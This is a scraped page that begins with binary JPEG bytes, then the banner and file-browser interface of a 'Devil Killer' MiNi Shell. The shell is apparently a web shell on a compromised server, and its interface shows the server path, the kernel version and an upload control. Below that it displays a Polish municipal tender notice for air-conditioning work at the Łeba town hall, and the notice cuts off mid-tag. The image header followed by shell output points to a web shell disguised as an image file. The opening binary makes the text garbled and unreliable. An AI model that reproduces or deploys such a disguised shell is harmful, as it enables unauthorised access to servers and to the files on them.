JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220328/0009980101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa, montaż i uruchomienie systemu klimatyzacji<br/>w pomieszczeniach Urzędu Miejskiego w Łebie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Łeba</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979743</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 90</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łeba</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">59 8661 510</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">59 8661 337</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@leba.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://leba.um.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa, montaż i uruchomienie systemu klimatyzacji<br/>w pomieszczeniach Urzędu Miejskiego w Łebie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cc6e166d-ae61-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00099801</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00010299/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Modernizacja budynku Urzędu Miejskiego - montaż systemu klimatyzacji pomieszczeń</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/leba <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/leba</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się drogą elektroniczną przy użyciu platformy zakupowej dostępnej pod adresem:<br/>https://platformazakupowa.pl/pn/leba<br/>2. Zaleca się, aby Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego, posiadał konto na platformie zakupowej. Rejestracja oraz logowanie dostępne jest pod<br/>adresem: https://platformazakupowa.pl/pn/leba Korzystanie z Platformy przez Wykonawcę jest<br/>bezpłatne.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z platformy zakupowej<br/>dostępnym pod adresem: https://platformazakupowa.pl/strona/1-regulamin.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z platformy zakupowej, określone w Regulaminie dostępnym pod<br/>adresem: https://platformazakupowa.pl/strona/1-regulamin.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i<br/>wycofania oferty oraz do komunikacji wynosi 150MB.<br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych<br/>środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub<br/>dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na platformę<br/>zakupową.<br/>7. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy<br/>i załączniki do oferty) odbywa się elektronicznie za pośrednictwem platformy zakupowej i formularza<br/>Wyślij wiadomość. Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana.<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem ogłoszenia (BZP)<br/>8. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email: iwona.mielewczyk@leba.eu.<br/>9. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składane są przez Wykonawcę jako załączniki. Zamawiający dopuszcza również możliwość składania<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za<br/>pomocą poczty elektronicznej, na adres email: iwona.mielewczyk@leba.eu. Sposób sporządzenia<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi<br/>być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1.<br/>administratorem Pani/Pana danych osobowych jest Urząd Miejski w Łebie, ul.Kościuszki 90, 84-360<br/>Łeba, tel. 598661510;<br/>2.<br/>inspektorem ochrony danych osobowych w Urzędzie Miejskim w Łebie jest Pan Radosław Czyżewski,<br/>kontakt: adres e-mail: radoslaw.czyzewski@leba.eu, telefon 59 8661 510 wew. 44;<br/>3.<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>4.<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843 z późn. zm.), dalej „ustawa Pzp”;<br/>5.<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6.<br/>obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7.<br/>w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8.<br/>posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.19.2022.IM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 243902,44 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: Dostawa, montaż i uruchomienie systemu klimatyzacji<br/>w pomieszczeniach Urzędu Miejskiego w Łebie.<br/>2.1. Wykonawca obowiązany jest dostarczyć 6 jednostek zewnętrznych oraz 26 jednostek<br/>wewnętrznych (zgodnie z zał. 10 do SWZ). Zamawiający dopuszcza dostarczenie minimum 5<br/>jednostek zewnętrznych oraz minimum 24 jednostek wewnętrznych. Instalacje winne zapewniać<br/>możliwość schłodzenia powietrza w pomieszczeniu.<br/>2.2. Wykonawca obowiązany jest przedstawić proponowane przez niego rozwiązania w formie<br/>dokumentacji (opis, rysunki, schematy, itp.), uwzględniającej założenia Zamawiającego dla<br/>systemu klimatyzacji, zasilania i sterowania urządzeń. Przedstawione konkretne rozwiązania<br/>(z doborem urządzeń, systemów, technologii i materiałów, z uwzględnieniem wymagań<br/>Zamawiającego) Wykonawca winien zrealizować w kosztach oferty.<br/>2.3. Wykonawca zobowiązany jest uwzględnić wszelkie koszty związane z wykonaniem<br/>przedmiotu zamówienia, w tym montażem związanych z posadowieniem jednostki zewnętrznej,<br/>prowadzenia przewodów, a także badań, pomiarów i sprawdzeń instalacji klimatyzacyjnej i<br/>instalacji elektrycznej oraz przeszkoleniem pracowników Zamawiającego w zakresie obsługi<br/>urządzeń.<br/>2.4. Przed rozpoczęciem montażu jednostek zewnętrznych Wykonawca zobowiązany jest do<br/>przedstawiania Zamawiającemu ekspertyzy technicznej konstrukcji dachowej, na której mają być<br/>zlokalizowane jednostki zewnętrzne sporządzonej przez osobę posiadającą uprawnienia w branży<br/>konstrukcyjno-budowlanej (wraz z decyzją o nadaniu uprawnień budowlanych w w/w branży oraz<br/>aktualnym zaświadczeniem o przynależności do właściwej terenowo izby samorządu<br/>zawodowego) w zakresie możliwości przeniesienia dodatkowego obciążenia przez konstrukcję.<br/>3.1. Opis systemu:<br/>Przewidziano system składający się z klimatyzatorów z jednostkami wewnętrznymi typu<br/>podstropowego obsługiwanych przez 1 jednostkę zewnętrzną (multisplit). Dostarczone urządzenia,<br/>ich montaż, montaż przewodów oraz dostarczone wyposażenia muszą zapewniać:<br/>- prawidłową pracę oddalonych od siebie jednostek zewnętrznej i wewnętrznych<br/>- odporność na warunki i czynniki atmosferyczne,<br/>- pracę w trybie chłodzenia w I strefie klimatycznej Polski,<br/>- wymagane funkcje.<br/>Zestawienie wymaganych (podstawowych) urządzeń, układów i elementów:<br/>– Agregat zewnętrzny (skraplający) Jednostka zewnętrzna układu<br/>klimatyzacji montowana na dachu budynku.<br/>– Klimatyzator podstropowy. Jednostka wewnętrzna układu<br/>klimatyzacji montowana w pomieszczeniach biurowych.<br/>– Pilot bezprzewodowy 1 Pilot sterujący parametrami pracy<br/>klimatyzacji, montaż w miejscu wskazanym przez Użytkownika<br/>3.2. Uszczegółowienie dla systemu klimatyzacji<br/>Do chłodzenia pomieszczeń przyjęto jednostkę wewnętrzną typu podstropowego oraz jednostkę<br/>zewnętrzną typu multisplit, zapewniające odpowiednią temperaturę poprzez regulację ilości<br/>czynnika chłodniczego. Regulacja temperatury odbywa się poprzez sterowniki montowane<br/>bezpośrednio w pomieszczeniu. Ponadto w pomieszczeniu winne być zamontowane:<br/>1 bezprzewodowy pilot, umożliwiające bezproblemową regulację temperatury w pomieszczeniu wg<br/>różnych scenariuszy: wg czujnika w pilocie przewodowym. Agregat skraplający (jednostka<br/>zewnętrzna) winien być zamontowany na dachu budynku w miejscu wskazanym przez<br/>Zamawiającego (uzgodnienie na roboczo). Wszystkie jednostki należy montować zgodnie z<br/>dokumentacją techniczno-ruchową urządzeń oraz wymaganiami producenta.<br/>3.3. Wymagania wykonawcze<br/>– W przypadku kolizji z istniejącymi instalacjami zmianę prowadzenia przewodów ustalać na<br/>bieżąco w trakcie realizacji inwestycji w uzgodnieniu z Zamawiającym.<br/>– Z uwagi na brak możliwości pełnej inwentaryzacji należy liczyć się z występowaniem elementów<br/>budowlanych i instalacyjnych utrudniających prowadzenie przewodów i instalacji, w takim<br/>przypadku kolizje rozwiązywać należy z Zamawiającym na bieżąco.<br/>– Wszystkie stosowane przy realizacji przedmiotu zamówienia wyroby, materiały, urządzenia etc.<br/>winne posiadać znak budowlany B lub znak CE (dopuszczenie do stosowania) oraz odpowiednie<br/>deklaracje zgodności, aprobaty techniczne, certyfikaty.<br/>3.3.1 Instalacja freonowa:<br/>– Instalacja freonowa nie powinna być prowadzona w miejscach, w których nie ma możliwości jej<br/>sprawdzenia. Należy zapewnić swobodny dostęp (np. poprzez klapy lub drzwiczki rewizyjne) do<br/>elementów wymagających okresowej kontroli. Każde odstępstwo od tej zasady musi być<br/>uzgodnione z Zamawiającym.<br/>– Do wykonania instalacji freonowej dopuszcza się wyłącznie rury z miedzi (Cu-DHP). Rury miedziane okrągłe bez szwu stosowane<br/>w instalacjach klimatyzacyjnych i chłodniczych. Rury winne<br/>być odtłuszczone i nadające się do ciśnień roboczych ≥ 3000 kPa.<br/>– Łączenie rur wykonać łącznikami fabrycznymi z miedzi lub brązu (nie dopuszcza się łączników<br/>mosiężnych) spełniającymi wymagania PN-EN 1254-5 „Miedź i stopy miedzi. Łączniki instalacyjne.<br/>Część 5: Łączniki do rur miedzianych z krótkimi końcówkami do kapilarnego lutowania twardego”<br/>w technologii lutowania twardego zgodnie z wymaganiami PN-EN 378-2+A2 „Instalacje ziębnicze i<br/>pompy ciepła. Wymagania dotyczące bezpieczeństwa i ochrony środowiska. Część 2:<br/>Projektowanie, wykonywanie, sprawdzanie, znakowanie i dokumentowanie”, z użyciem lutu<br/>twardego spełniającego wymagania PN-EN 1044 „Lutowanie twarde. Spoiwa” i topników wg PNEN<br/>1045 „Lutowanie twarde. Topniki do lutowania twardego. Klasyfikacja i techniczne warunki<br/>dostawy.”<br/>– Miejsca lutowane winne być właściwie i jednoznacznie oznakowane.<br/>– Zapewnić prawidłowy dobór średnic instalacji freonowe (uzależnione to jest od długości oraz<br/>wydajności chłodniczej lub cieplnej).<br/>– Przewody łączące jednostkę wewnętrzną z zewnętrzną winne być prowadzone poziomo<br/>w białych plastikowych korytkach montażowych pod stropem. Mocowanie rur chłodniczych<br/>powinno wynikać z wytycznych technicznych dla danego przekroju i miejsca montażu;<br/>maksymalna odległość między punktami mocowania to 1,50 m.<br/>– Przejścia instalacji przez przegrody budowlane winne odbywać się przez tuleje ochronne,<br/>właściwie wykonane i uszczelnione (uszczelnienie trwale elastycznie).<br/>– Wszystkie przewody chłodnicze muszą być zaizolowane oddzielnie otuliną przeznaczoną do<br/>instalacji chłodniczych, zapobiegającą kondensacji pary wodnej na przewodach oraz<br/>przeciwdziałające korozji przewodów. Otulina winna ściśle przylegać do powierzchni izolowanych<br/>rur (dobór otuliny do średnicy izolowanego przewodu), zaś połączenie poszczególnych segmentów<br/>otuliny winne być ze sobą klejone. Materiał otuliny winien być dostosowany do stosowania w<br/>zakresie temperatur w przedziale od –50°C do + 150°C , zaś w<br/>przestrzeniach narażonych na światło słoneczne dodatkowo winien być odporny na<br/>promieniowanie UV (dopuszcza się tutaj użycie dodatkowej rury uchronnej odpornej na UV).<br/>Grubość otuliny zgodnie z wymaganiami producenta klimatyzatora, lecz nie mniejsza niż 13 mm.<br/>Mocowanie zaizolowanych rur np. do konstrukcji nośnej nie może powodować zgniecenia warstwy<br/>otuliny. Prawidłowe izolowanie dotyczy również miejsc gięć i połączeń rur. W przypadku<br/>prowadzenia rur zziębnych w odległości mniejszej niż 15 cm od rur centralnego ogrzewania<br/>wymaga się zastosowania dodatkowej (oprócz opisanej wyżej) otuliny izolującej cieplnie przewody<br/>freonowe.<br/>– Próbę szczelności dla przewodów wykonać na ciśnienie 4,15 MPa (wymagany protokół z próby<br/>wykonanej w obecności Zamawiającego i/lub Użytkownika).<br/>3.3.2 Instalacja elektryczna.<br/>– Ilości, rodzaj i średnice przewodów winne wynikać z dokumentacji techniczno-ruchowej<br/>urządzeń, wymagań producenta i przepisów w zakresie instalacji elektrycznych.<br/>– Zamawiający wskazuje (pomieszczenie 1.4) miejsce, skąd mogą być zasilane odpowiednie<br/>obwody. Jeżeli istniejąca rozdzielnica nie spełni wymagań technicznych w zakresie zasilania<br/>systemu klimatyzacyjnego lub w istniejącej rozdzielnicy brak jest miejsca na aparaty ochronno-<br/>7<br/>zabezpieczające, Zamawiający zleci Wykonawcy – na podstawie art. 214 ust. 1 ustawy Prawo<br/>zamówień publicznych – montaż rozdzielnicy z wyposażeniem zabezpieczająco – ochronnym<br/>wymaganym przez producenta urządzeń i przepisy oraz wykonanie WLZ od rozdzielnicy głównej.<br/>Wykonawca winien uwzględnić konieczność prowadzenia przewodów w sposób niepogarszający<br/>estetyki budynku (wg wskazań Zamawiającego ustalonych na bieżąco).<br/>3.3.3. Montaż<br/>– Przejścia rur i instalacji przez przegrody winne być wykonane w sposób umożliwiający<br/>późniejszą niedestrukcyjną wymianę elementów. Przejścia te winne również zapewniać<br/>elastyczność i izolacyjność termiczną (odpowiednie otulenie przewodów, kanałów i rur).<br/>Przejście przez ścianę zewnętrzną należy wykonać przewiertem w sposób umożliwiający wyjście<br/>na zewnątrz, zaś wszelkie przewody i rury winne przechodzić przez ścianę i wychodzić poza lico<br/>elewacji ze spadkiem, zaś wchodzić do jednostki zewnętrznej „pod górę”.<br/>3.3.4. Pozostałe wymagania<br/>– Wykonawca – przed realizacją przedmiotu umowy – obowiązany jest przedstawić proponowane<br/>przez niego rozwiązania w formie dokumentacji (opis, rysunki, schematy, itp.), uwzględniającej<br/>założenia Zamawiającego dla systemu klimatyzacji, zasilania i sterowania urządzeń.<br/>Przedstawione konkretne rozwiązania (z doborem urządzeń, systemów, technologii i materiałów,<br/>z uwzględnieniem wymagań Zamawiającego) Wykonawca winien zrealizować w kosztach oferty.<br/>– Zamawiający informuje, iż montaż odbywać się będzie w czynnym obiekcie użyteczności<br/>publicznej. W związku z powyższym Wykonawca winien tak organizować prace, aby nie utrudniać<br/>pracy Urzędu Miejskiego (szczególnie dotyczy to prac wywołujących nadmierny hałas). Prace<br/>związane z użyciem narzędzi powodujących hałas muszą być prowadzone w uzgodnieniu<br/>z Użytkownikiem. Wykonawca winien przewidzieć wykonywanie prac poza godzinami urzędowania<br/>Urzędu Miejskiego. Zamawiający i Użytkownik zastrzegają prawo wstrzymywania (przerywania) prac,<br/>które zakłócać będą pracę Urzędu Miejskiego – bez względu na stan, zakres i zaawansowanie prac. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45331230-7 - Instalowanie urządzeń chłodzących</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span 